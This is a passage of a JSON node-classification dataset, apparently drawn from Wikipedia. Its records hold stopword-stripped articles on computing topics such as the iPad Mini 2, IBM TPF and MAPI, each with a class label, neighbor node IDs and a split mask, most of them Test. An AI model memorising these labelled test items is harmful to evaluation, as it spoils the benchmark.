    "text": "IPad_Mini_2:ipad mini 2 ipad mini 2 stylized marketed ipad mini 2 previously marketed ipad mini retina display second-generation ipad mini tablet computer produced marketed apple inc design almost identical first generation ipad mini features internal revisions addition a7 system-on-a-chip 2,048 × 1,536 resolution retina display ipad mini 2 nearly hardware larger sibling ipad air apple released ipad mini 2 space gray silver colors november 12 2013 successor ipad mini 3 unveiled october 16 2014 featuring internals adding touch id differing storage sizes additional gold color ipad mini 2 discontinued march 21 2017 following press announcement new lower cost ipad replaces ipad air 2 ipad mini 2 first ipad mini support six major versions ios ios 7 ios 12 ipad mini 2 announced keynote yerba buena center arts october 22 2013 theme keynote named 'we still lot cover ipad mini 2 originally marketed ipad mini retina display however successor ipad mini 3 announced october 16 2014 apple started marketing former device ipad mini 2 ipad mini 2 comes ios 7 operating system released september 18 2013 jony ive designer ios 7 new elements described update bringing order complexity highlighting features refined typography new icons translucency layering physics gyroscope-driven parallaxing major changes design design ios 7 os x mavericks version 10.9 noticeably depart skeuomorphic elements green felt game center wood newsstand leather calendar favor flat colourful design act hotspot carriers sharing internet connection wi-fi bluetooth usb also access apple app store digital application distribution platform ios service allows users browse download applications itunes store developed xcode ios sdk published apple app store garageband imovie iphoto iwork apps pages keynote numbers available ipad mini 2 bluetooth function attaches wireless keyboard headset allows user access wireless keyboard used apple pages writing program needs editing ipad mini 2 comes several pre-installed applications including siri safari mail photos video music itunes app store maps notes calendar game center photo booth contacts like ios devices ipad sync content data mac pc using itunes although ios 5 later managed backed without computer although tablet designed make phone calls cellular network users use headset built-in speaker microphone place phone calls wi-fi cellular using voip application skype device dictation application using voice recognition technology iphone 4s enables users speak ipad types say screen though ipad must internet connection available via wi-fi cellular network due feature reliance apple servers translate speech ipad mini 2 ibooks application originally optional app though since release ios 8 comes pre-installed displays books epub-format content downloaded ibooks store several major book publishers including penguin books harpercollins simon schuster macmillan committed publishing books device despite direct competitor amazon kindle barnes noble nook amazon.com barnes noble offer e-reader apps ipad siri intelligent personal assistant knowledge navigator included application uses natural language user interface answer questions make recommendations perform actions delegating requests set web services apple claims software adapts user individual preferences time personalizes results ios 7 adds new male female voices new system setting functionalities redesign match rest operating system integration twitter wikipedia bing photos facebook comes integrated apple native apps facebook features directly accessed within native apps calendar sync facebook events use facebook like button within apple app store june 2 2014 announced ipad mini 2 would receive ios 8 update june 13 2016 announced ipad mini 2 support ios 10 update june 5 2017 also announced ipad mini 2 support ios 11 update apple announced ipad mini 2 support ios 12 update together apple a7 cousins make first ipad mini support six major versions ios ios 7 ios 12 longest supported ipad mini june 2019 apple announced drop support ipad mini 2 release ipados along a7 cousins ipad mini 2 sized 7.9-inch screen largely design first generation ipad mini 1st generation one notable change inclusion retina display matching screen resolution full-sized retina ipad models mini 2 features resolution ipad air makes mini 2 screen even pixel dense compared larger sibling slate-colored back panel first-generation ipad mini discontinued favor space gray lighter grey tone whilst silver color option still remained ipad mini 2 shares hardware components ipad air iphone 5s notably 64-bit apple a7 system-on-chip apple m7 motion processor mini 2 a7 system-on-chip clocked slightly slower otherwise one ipad air iphone 5s three released q4 2013 mini 2 uses home button predecessor therefore support touch id feature added succeeding ipad mini 3 mini 2 also includes 5 megapixel rear-facing camera 1.2 mp facetime hd front-facing camera support 802.11n estimated 10 hours battery life previous generations ipad hardware four buttons one switch ipad mini 2 device portrait orientation home button face device display returns user home screen wake/sleep button top edge device two buttons upper right side device performing volume up/down functions switch whose function varies according device settings functioning either switch device silent mode lock/unlock orientation screen addition wifi version weighs 331 grams cellular model weighs 341 grams – slightly respective predecessors display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense orientation switch portrait landscape modes unlike iphone ipod touch built-in applications work three orientations portrait landscape-left landscape-right ipad built-in applications support screen rotation four orientations including upside-down consequently device intrinsic native orientation relative position home button changes audio playback ipad mini 2 stereo two speakers located either side lightning connector ipad mini 2 originally available 16 32 64 128gb internal flash memory expansion option however announcement ipad mini 3 october 16 2014 64 128gb versions ipad mini 2 discontinued september 7 2016 16gb model discontinued well final model 32gb discontinued march 21 2017 following unveiling new lower-cost ipad apple also sells camera connection kit sd card reader used transfer photos videos ipad mini 2 models connect wireless lan offer dual band wi-fi support also manufactured either without capability communicate cellular network tablet cellular model comes two variants support nano-sims quad-band gsm penta-band umts dual-band cdma ev-do rev b. additionally one variant also supports lte bands 1 2 3 4 5 7 8 13 17 18 19 20 25 26 variant supports lte bands 1 2 3 5 7 8 18 19 20 td-lte bands 38 39 40 apple ability handle many different bands one device allowed offer first time single ipad variant supports cellular bands technologies deployed major north american wireless providers time device introduction mini 2 praised packing essentially hardware larger expensive ipad air significantly compact lighter featuring even pixel-dense screen keeping resolution despite smaller display 100 usd cheaper air mini 2 essentially rendered obsolete similarly-priced ipad 2 ipad 4 remained apple ipad lineup first year mini 2 availability budget alternative ipad air writing techradar gareth beavis awarded ipad mini 2 rating 4.5 5 beavis praises retina display a7 chip performance states design still best tablet category however criticize price increase website anandtech anand lal shimpi highly compliments design increased speed ipad mini 2 lamenting limited color palette stating ... ’ shame tradeoff exists two ipads especially given good apple srgb coverage nearly displays despite criticisms quality camera jeffrey van camp digital trends gave tablet score 4.5 5 writes ipad mini 2 favorite tablet 2013 powerful 64-bit a7 processor high-resolution ‘ retina ’ screen finishes job apple started first ipad mini addressing main complaints original mini under-powered processor low-resolution display like contemporary ipads mini 2 rear camera photo quality mediocre compared iphones ipad mini 2 also considerably expensive closest android competitor nexus 7 although mini 2 significantly powerful better build quality well apple larger tablet-specific app selection established ecosystem ipad mini 2 criticized thicker heavier original ipad mini also criticized taking longer time charge",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10020,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      8046,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 10879,
    "label": 2,
    "text": "Windows_Meeting_Space:windows meeting space windows meeting space codenamed windows shared view also referred windows collaboration peer-to-peer collaboration program developed microsoft windows vista replacement older windows netmeeting application however features microphone support ability set audio video conferences removed meeting space enables application sharing collaborative editing desktop sharing file sharing projecting simple text-based ink-based instant messaging across 10 users connected network across internet meeting space ability automatically set ad hoc wireless network connection network internet available also enables participants invite people meeting sessions one first applications new peer-to-peer infrastructure windows vista hence requires ipv6 meeting space available editions windows vista functionality unavailable starter edition home basic edition allows users join sessions meeting space exist edition windows 7 microsoft recommended microsoft office live meeting replacement meeting space result microsoft peer-to-peer collaboration efforts—with emphasis mobile computing—discussed windows hardware engineering conference 2004 windows vista codenamed longhorn time reported windows vista would enable users create ad hoc wireless networks file sharing discover people connected nearby meeting space relies functionality services meeting space demonstrated jim allchin darryn dieken professional developers conference pdc 2005 projected shared powerpoint presentation allchin stated demonstration illustrate functions application itself—development complete time—but illustrate select capabilities peer-to-peer framework windows vista later interview paul thurrott allchin expressed desire developers create applications supporting peer-to-peer capabilities starting session workspace contains presentation area displayed list notes also shown list users local subnet collaboration session started automatically detected using people near functionality based ws-discovery peer-to-peer networking implementation windows vista users outside local subnet must sent e-mail file invitation participate applications shared session local session application shared windows meeting space switches presentation mode participants see presenter working collaboratively edit review shared application instance",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      3394,
      3922,
      4439,
      5465,
      5470,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      425,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8640,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 10880,
    "label": 4,
    "text": "ValidSoft:validsoft validsoft security software company providing telecommunications-based multi-factor authentication identity transaction verification technology company founded 2003 current ceo patrick carroll company provides business-to-business mobile security cloud security products including multi-factor authentication platform called smart secure mobile architecture real-time transactions uses mobile telecommunication channels devices includes proprietary voice biometric engine solutions designed reduce electronic fraud safeguard consumer privacy using internet mobile banking credit/debit card mobile fixed line telephony channels validsoft products designed verify authenticity parties transaction mutual authentication ensure fidelity telecommunication channels secure communications confirm integrity transactions transaction verification",
    "neighbors": [
      9488,
      5433,
      9356,
      11244
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10881,
    "label": 9,
    "text": "Peter_J._Weinberger:peter j. weinberger peter jay weinberger born august 6 1942 computer scientist best known early work bell labs works google weinberger undergraduate swarthmore college graduating 1964 received phd mathematics number theory 1969 university california berkeley derrick henry lehmer thesis entitled proof conjecture gauss class number two holding position department mathematics university michigan ann arbor continued work analytic number theory moved bell labs bell labs weinberger contributed design awk programming language w awk fortran compiler f77 detailed explanation contributions awk unix tools found interview transcript princeton university another interview sheds light work google interviews also confirm rumors involvement early digital photography especially abuse photograph face demonstrating digital imaging effects peter weinberger promoted head computer science research bell labs picture merged death star logo mid-80s creating pjw face image appeared innumerable locations including t-shirts coffee mugs cds least one water tower sole remaining pjw face bell labs somewhat disarray plans afoot repair prior joining google weinberger chief technology officer renaissance technologies weinberger member jason defense advisory group since 1990 erdos number 2",
    "neighbors": [
      515,
      3468,
      9298,
      1783,
      3960,
      6617
    ],
    "mask": "None"
  },
  {
    "node_id": 10882,
    "label": 4,
    "text": "Key_ring_file:key ring file key ring file contains multiple public keys certificate authority ca key ring file necessary secure sockets layer ssl connection web securely stored server hosts website contains public/private key pair particular website also contains public/private key pairs various certificate authorities trusted root certificate various certification authorities entity website administrator send certificate signing request csr ca ca returns signed certificate entity certificate received ca stored key ring",
    "neighbors": [
      9744,
      8674,
      517
    ],
    "mask": "Test"
  },
  {
    "node_id": 10883,
    "label": 2,
    "text": "Transaction_Processing_Facility:transaction processing facility transaction processing facility tpf ibm real-time operating system mainframe computers descended ibm system/360 family including zseries system z9 tpf delivers fast high-volume high-throughput transaction processing handling large continuous loads essentially simple transactions across large geographically dispersed networks industrial-strength transaction processing systems notably ibm cics ims tpf specialty extreme volume large numbers concurrent users fast response times example visa credit card transaction processing peak holiday shopping season tpf passenger reservation application pars international version ipars used many airlines one tpf major optional components high performance specialized database facility called tpf database facility tpfdf close cousin tpf transaction monitor alcs developed ibm integrate tpf services common mainframe operating system mvs z/os tpf evolved airlines control program acp free package developed mid-1960s ibm association major north american european airlines 1979 ibm introduced tpf replacement acp — priced software product new name suggests greater scope evolution non-airline related entities tpf traditionally ibm system/370 assembly language environment performance reasons many tpf assembler applications persist however recent versions tpf encourage use c. another programming language called sabretalk born died tpf ibm announced delivery current release tpf dubbed z/tpf v1.1 september 2005 significantly z/tpf adds 64-bit addressing mandates use 64-bit gnu development tools gcc compiler dignus systems/c++ systems/c supported compilers z/tpf dignus compilers offer reduced source code changes moving tpf 4.1 z/tpf current users include sabre reservations visa inc. authorizations american airlines american express authorizations dxc technology shares reservations formerly eds hpes holiday inn central reservations amtrak marriott international travelport galileo apollo worldspan axess japan gds citibank air canada trenitalia reservations delta air lines reservations operations japan airlines tpf capable running multiprocessor systems one cpu within lpar cpus referred instruction streams simply i-streams running lpar one i-stream tpf said running tightly coupled tpf adheres smp concepts concept numa-based distinctions memory addresses exist depth cpu ready list measured incoming transaction received queued i-stream lowest demand thus maintaining continuous load balancing among available processors cases loosely coupled configurations populated multiprocessor cpcs central processing complex i.e physical machine packaged one system cabinet smp takes place within cpc described whereas sharing inter-cpc resources takes place described loosely coupled tpf architecture memory except 4kb-sized prefix area shared among i-streams instances memory-resident data must kept separated i-stream programmer typically allocates storage area number subsections equal number i-streams accesses desired i-stream associated area taking base address allocated area adding product i-stream relative number times size subsection tpf capable supporting multiple mainframes size — single i-stream multiple i-stream connecting operating common database currently 32 ibm mainframes may share tpf database system operation would called 32-way loosely coupled simplest loosely coupled system would two ibm mainframes sharing one dasd direct access storage device case control program would equally loaded core program record dasd could potentially accessed either mainframe order serialize accesses data records loosely coupled system practice known record locking must used means one mainframe processor obtains hold record mechanism must prevent processors obtaining hold communicate requesting processors waiting within tightly coupled system easy manage i-streams via use record hold table however lock obtained offboard tpf processor dasd control unit external process must used historically record locking accomplished dasd control unit via rpq known llf limited locking facility later ellf extended llf ellf replaced multipathing lock facility mplf run clustered loosely coupled z/tpf requires either mplf disk control units alternative locking device called coupling facility records absolutely must managed record locking process processor shared tpf record accesses done using record type ordinal defined record type tpf system 'fred gave 100 records ordinals processor shared scheme record type 'fred ordinal 5 would resolve exactly file address dasd — clearly necessitating use record locking mechanism processor shared records tpf system accessed via exactly file address resolve exactly location processor unique record one defined processor expected loosely coupled complex record type 'fred perhaps 100 ordinals however user 2 processors examines file address record type 'fred ordinal 5 resolves note different physical address used tpf general-purpose operating system gpos tpf specialized role process transaction input messages return output messages 1:1 basis extremely high volume short maximum elapsed time limits tpf built-in graphical user interface functionality tpf never offered direct graphical display facilities implement host would considered unnecessary potentially harmful diversion real-time system resources tpf user interface command-line driven simple text display terminals scroll upwards mouse-driven cursors windows icons tpf prime cras computer room agent set — best thought operator console character messages intended mode communications human users work accomplished via use command line similar unix without x several products available connect prime cras provide graphical interface functions tpf operator tpf operations server graphical interfaces end users desired must provided external systems systems perform analysis character content see screen scrape convert message to/from desired graphical form depending context specialized purpose operating system tpf host compiler/assembler text editor implement concept desktop one might expect find gpos tpf application source code commonly stored external systems likewise built offline starting z/tpf 1.1 linux supported build platform executable programs intended z/tpf operation must observe elf format s390x-ibm-linux using tpf requires knowledge command guide since support online command directory man /help facility users might accustomed commands created shipped ibm system administration tpf called functional messages -- commonly referred z-messages prefixed letter z letters reserved customers may write commands tpf implements debugging distributed client-server mode necessary system headless multi-processing nature pausing entire system order trap single task would highly counter-productive debugger packages developed 3rd party vendors took different approaches break/continue operations required tpf host implementing unique communications protocols used traffic human developer running debugger client server-side debug controller well form function debugger program operations client side two examples 3rd party debugger packages step step trace bedford associates cmstpf tpf/gi ztpfgi tpf software inc.. neither package wholly compatible ibm offering ibm debugging client offering packaged ide called ibm tpf toolkit tpf highly optimized permit messages supported network either switched another location routed application specific set programs permit extremely efficient accesses database records historically data tpf system fit fixed record core block sizes 381 1055 4k bytes due part physical record sizes blocks located dasd much overhead saved freeing part operating system breaking large data entities smaller ones file operations reassembling read operations since ibm hardware i/o via use channels channel programs tpf would generate small efficient channel programs i/o — name speed since early days also placed premium size storage media — memory disk tpf applications evolved powerful things using little resource today much limitations removed fact legacy support smaller-than-4k dasd records still used advances made dasd technology read/write 4k record efficient 1055 byte record advances increased capacity device longer premium placed ability pack data smallest model possible tpf also program segments allocated 381 1055 4k byte-sized records different points history segment consisted single record typically comprehensive application requiring perhaps tens even hundreds segments first forty years tpf history segments never link-edited instead relocatable object code direct output assembler laid memory internally self-referential relocatable symbols resolved entire image written file later loading system created challenging programming environment segments related one another could directly address control transfer implemented enter/back system service acp/tpf earliest days circa 1965 memory space severely limited gave rise distinction file-resident core-resident programs -- frequently used application programs written memory never removed core-residency rest stored file read demand backing memory buffers released post-execution introduction c language tpf version 3.0 first implemented conformant segment conventions including absence linkage editing scheme quickly demonstrated impractical anything simplest c programs tpf 4.1 truly fully linked load modules introduced tpf compiled z/os c/c++ compiler using tpf-specific header files linked iewl resulting z/os-conformant load module manner could considered traditional tpf segment tpf loader extended read z/os-unique load module file format lay file-resident load modules sections memory meanwhile assembly language programs remained confined tpf segment model creating obvious disparity applications written assembler written higher level languages hll z/tpf 1.1 source language types conceptually unified fully link-edited conform elf specification segment concept became obsolete meaning program written source language -- including assembler -- may size furthermore external references became possible separate source code programs segments could directly linked together shared object value point critical legacy applications benefit improved efficiency simple repackaging -- calls made members single shared object module much shorter pathlength run time compared calling system enter/back service members shared object may share writeable data regions directly thanks copy-on-write functionality also introduced z/tpf 1.1 coincidentally reinforces tpf reentrancy requirements concepts file- core- residency also made obsolete due z/tpf design point sought programs resident memory times since z/tpf maintain call stack high-level language programs gave hll programs ability benefit stack-based memory allocation deemed beneficial extend call stack assembly language programs optional basis ease memory pressure ease recursive programming z/tpf executable programs packaged elf shared objects historically step previous core blocks— memory— also 381 1055 4 k bytes size since memory blocks size overhead obtaining memory found systems discarded programmer merely needed decide size block would fit need ask tpf would maintain list blocks use simply hand first block available list physical memory divided sections reserved size 1055 byte block always came section returned overhead needed add address appropriate physical block table list compaction data collection required applications got advanced demands memory increased c became available memory chunks indeterminate large size required gave rise use heap storage memory management routines ease overhead tpf memory broken frames— 4 kb size 1 mb z/tpf application needs certain number bytes number contiguous frames required fill need granted",
    "neighbors": [
      2560,
      5120,
      6148,
      6664,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      10273,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      4668,
      573,
      6207,
      576,
      2625,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      5220,
      9829,
      1126,
      6248,
      6760,
      8298,
      9835,
      10856,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      2172,
      3197,
      1150,
      5247,
      11383,
      11390,
      2179,
      6276,
      10891,
      6797,
      10382,
      9361,
      9366,
      7319,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      7848,
      4781,
      8879,
      3248,
      178,
      9907,
      6325,
      6837,
      6329,
      8889,
      5823,
      1219,
      8388,
      1221,
      6342,
      9927,
      1736,
      2248,
      9932,
      5840,
      1235,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      10482,
      9977,
      9466,
      2811,
      3323,
      2813,
      1278,
      9468,
      10499,
      1804,
      11024,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      3359,
      10016,
      292,
      10235,
      2345,
      6442,
      1323,
      10030,
      7983,
      2355,
      7477,
      823,
      10040,
      4409,
      6459,
      7483,
      7999,
      321,
      10561,
      11075,
      4423,
      6985,
      5452,
      6988,
      5457,
      11601,
      7507,
      341,
      7511,
      10590,
      863,
      865,
      3426,
      3938,
      868,
      3429,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      375,
      376,
      8573,
      7039,
      8063,
      6529,
      10113,
      4996,
      8069,
      394,
      3978,
      4492,
      7053,
      8077,
      7057,
      9619,
      11667,
      11673,
      11675,
      8092,
      6557,
      2462,
      5022,
      9628,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      5040,
      7601,
      11184,
      435,
      9139,
      10676,
      5562,
      6075,
      6078,
      9151,
      964,
      11204,
      11205,
      4040,
      8136,
      9162,
      9166,
      477,
      6624,
      5603,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10884,
    "label": 2,
    "text": "GeeksPhone_Keon:geeksphone keon geeksphone keon entry-level smartphone released geeksphone april 2013 intended software developers wanting build test mobile applications new firefox os general consumers keon higher-end peak first commercially available mobile devices running firefox os geeksphone keon peak initially became available 23 april 2013 first batch sold hours",
    "neighbors": [
      7492,
      9863,
      5963,
      9964,
      1776,
      2259,
      8919,
      9913,
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 10885,
    "label": 9,
    "text": "PostScript_Printer_Description:postscript printer description postscript printer description ppd files created vendors describe entire set features capabilities available postscript printers ppd also contains postscript code commands used invoke features print job ppds function drivers postscript printers providing unified interface printer capabilities features example generic ppd file models hp color laserjet contains specifies printer understands postscript level 2 color device forth ppd describe allowable paper sizes memory configurations minimum font set printer even specify tree-based user interface printer-specific configuration ppd also often called postscript page description instead printer description postscript concept page devices postscript page description configuration read saved ppd file cups uses ppd drivers postscript printers even extended concept allow postscript printing non-postscript printing devices directing output cups filter file longer standard ppd rather cups-ppd cups clients usually read current ppd file server every time new print job created microsoft windows also uses ppd files converts binary .bpd file format using normally stored c \\windows\\system32\\spool\\drivers\\w32x86\\3 x86 system c \\windows\\system32\\spool\\drivers\\x64\\3 64 bit system updating ppd files requires removing reinstalling printer mime type cups variant ppd application/vnd.cups.ppd",
    "neighbors": [
      3974,
      7626,
      6797,
      6830,
      10352,
      3921,
      8628,
      1877
    ],
    "mask": "Test"
  },
  {
    "node_id": 10886,
    "label": 2,
    "text": "MAPI:mapi messaging application programming interface mapi api microsoft windows allows programs become email-aware mapi designed independent protocol usually used communicate microsoft exchange server mapi uses functions loosely based x.400 xapia standard includes facilities access message transports message stores directories simple mapi smapi subset 12 functions enable developers add basic messaging functionality extended mapi emapi allows complete control messaging system client computer includes creation management messages plus management client mailbox service providers simple mapi included microsoft windows part outlook express/windows mail full extended mapi included office outlook exchange addition extended mapi client interface programming calls made indirectly simple mapi api client interface common messaging calls cmc api client interface object-based cdo library interface three methods easier use designed less complex messaging-enabled -aware applications simple mapi cmc removed exchange 2003 mapi originally designed microsoft company founded ms mail team 1987 acquired consumers software 1991 obtain network courier messaging product reworked sold ms pc mail microsoft mail pc networking basic api ms pc mail later known mapi version 0 mapi0 differentiate true mapi full extended mapi interface required interfacing messaging-based services client applications outlook example several non-microsoft e-mail server product vendors created mapi service providers allow products accessed via outlook notable examples include axigen mail server kerio connect scalix zimbra hp openmail ibm lotus notes zarafa/kopano bynari mapi also service provider interface sorts microsoft used interface ms mail email system based xenix internal use extended mapi main e-mail data access method used outlook interface microsoft exchange via mapi service providers shipped outlook microsoft released full details mapi/rpc protocol since august 2007 mapi protocol colloquial name mapi/rpc times microsoft also called exchange rpc outlook-exchange transport protocol microsoft provides sample mapi/rpc-based application called mfcmapi assist developers also widely used diagnostics tool developers microsoft exchange administrators original implementation designed use local network lan outlook anywhere feature extended external internet-facing interface mapi/http introduced 2014 exchange 2013 sp1 replaced 'normal http-based stack several open-source software projects started working implementing mapi libraries including",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      1086,
      4174,
      4178,
      9813,
      603,
      2145,
      2679,
      1656,
      5754,
      9340,
      5761,
      6787,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      7857,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      3344,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      5968,
      10079,
      11616,
      2943,
      9609,
      10121,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 10887,
    "label": 7,
    "text": "Smartsheet:smartsheet smartsheet software service saas application collaboration work management developed marketed smartsheet inc used assign tasks track project progress manage calendars share documents manage work using spreadsheet-like user interface smartsheet used collaborate project timelines documents calendars tasks work according idg part office productivity part project management part document sharing ... trying central hub people work smartsheet combines functionality microsoft excel project access sharepoint competes microsoft project 10 million users 85,000 organizations according forbes smartsheet relatively simple user interface interface centers smartsheets similar spreadsheets typically found microsoft excel smartsheet rows expanded collapsed see individual tasks large-scale project progress respectively tasks sorted deadline priority person assigned spreadsheet contains dates smartsheet create calendar view row smartsheet may files attached emails stored within discussion board associated new smartsheet created notifications pushed staff populate rows columns information updated smartsheets tracking task project data-point updated automatically service also alerts task deadline coming keeps track document versions smartsheet import data microsoft office google applications software integrates services like salesforce.com dropbox amazon web services also smartsheet mobile app android iphone operating systems smartsheet sold subscription basis free version smartsheet first introduced 2006 according company co-founder brent frei initial adoption slow software difficult use end first year 10,000 users company began making changes software 2008 eventually cutting 60 percent features purpose making user-friendly following 2010 launch redesign adoption grew 1 million users 20,000 organizations 2012 integration microsoft office 365 microsoft azure added 2014 october account map tool introduced uses algorithm visualize flow work across groups employees august 2014 version 2.0 smartsheet ios app introduced made spreadsheet-like user interface focus app user interface whereas previously mobile interface different spreadsheet-oriented desktop version 2015 smartsheet started introducing closer integrations microsoft office products part thanks changes microsoft making products work better third-party software january 2015 smartsheet added support microsoft identity management software azure active directory allowed users log products like excel smartsheet login users also make changes smartsheets directly microsoft outlook 2016 smartsheet introduced sights configurable dashboard shows metrics team performing key performance indicators smartsheet inc. publicly-listed company develops markets smartsheet application 2017 760 employees headquartered bellevue washington company founded summer 2006 shortly co-founder brent frei sold prior company onyx software initially funded mostly frei year founding smartsheet raised 4 million funding nine employees early 2012 raised 8.2 million funding three rounds hired first salesperson smartsheet software redesigned 2010 company revenues grew 100 percent year four consecutive years raised 26 million funding december 2012 another 35 million may 2014 2017 company raised additional 52.1 million funding 2018 announced smartsheet acquired converse.ai scotland-based company develops software creating business automation bots company began trading new york stock exchange april 27 2018",
    "neighbors": [
      3521,
      10090,
      4623,
      7248,
      1935,
      467
    ],
    "mask": "Test"
  },
  {
    "node_id": 10888,
    "label": 2,
    "text": "AVFoundation:avfoundation avfoundation framework objective-c interface provides high-level services working time-based audiovisual media apple operating systems ios macos tvos watchos first introduced ios 2.2 seen significant changes ios 4 ios 5 ios 6 starting mac os x lion default media framework macos platform",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9784,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      3248,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      10470,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      3948,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      7133,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 10889,
    "label": 4,
    "text": "IPOP:ipop ipop ip-over-p2p open-source user-centric software virtual network allowing end users define create virtual private networks vpns ipop virtual networks provide end-to-end tunneling ip ethernet “ tincan ” links setup managed control api create various software-defined vpn overlays ipop started research project university florida 2006 first-generation design implementation ipop built atop structured p2p links managed c brunet library first design ipop relied brunet ’ structured p2p overlay network peer-to-peer messaging notifications nat traversal ip tunneling brunet-based ipop still available open-source code however ipop ’ architecture implementation evolved starting september 2013 project funded national science foundation si2 software infrastructure sustained innovation program enable open-source “ scientific software element ” research cloud computing second-generation design ipop incorporates standards xmpp stun turn libraries libjingle evolved since project ’ beginning create p2p tunnels – refer tincan links current tincan-based ipop implementation based modules written c/c++ leverage libjingle create tincan links exposing set apis controller modules manage setup creation management tincan links enhanced modularity controller module runs separate process c/c++ module implements tincan links communicate json-based rpc system thus controller written languages python",
    "neighbors": [
      10631,
      9722,
      8211,
      11162,
      3742,
      9764,
      4268,
      10417,
      7859,
      2228,
      3770,
      3777,
      2884,
      581,
      8265,
      11468,
      3792,
      7376,
      2136,
      5084,
      6364,
      10210,
      9318,
      8039,
      8554,
      11248,
      5749,
      3322,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10890,
    "label": 0,
